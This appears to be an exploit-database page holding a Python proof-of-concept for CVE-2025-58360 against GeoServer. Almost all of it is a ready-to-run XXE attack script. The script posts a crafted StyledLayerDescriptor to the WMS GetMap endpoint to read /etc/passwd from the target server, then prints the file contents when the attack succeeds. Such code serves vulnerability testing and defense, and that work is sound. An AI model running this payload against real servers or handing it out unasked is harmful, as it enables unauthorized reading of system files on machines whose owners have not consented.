4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2025-58360.py PY
import requests
import argparse

parser = argparse.ArgumentParser(description="Type your URL")
parser.add_argument("-u", "--url", required=True, help="URL input:")

args = parser.parse_args()
url = args.url

url = "{url}/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90".format(url=url)
cookies = {"JSESSIONID": "E903ED6B2C11E44FC3F2B126B961F913"}
headers = {"Accept-Language": "en-US,en;q=0.9", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"}

data = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n                <!DOCTYPE StyledLayerDescriptor [\r\n <!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>\r\n                <StyledLayerDescriptor version=\"1.0.0\">\r\n                <NamedLayer><Name>&xxe;</Name></NamedLayer>\r\n                </StyledLayerDescriptor>"

response = requests.post(url, headers=headers, cookies=cookies, data=data)

if "root:" in response.text:
   print("Vuln detect!")
   print(response.text)
else:
   print("Not vuln")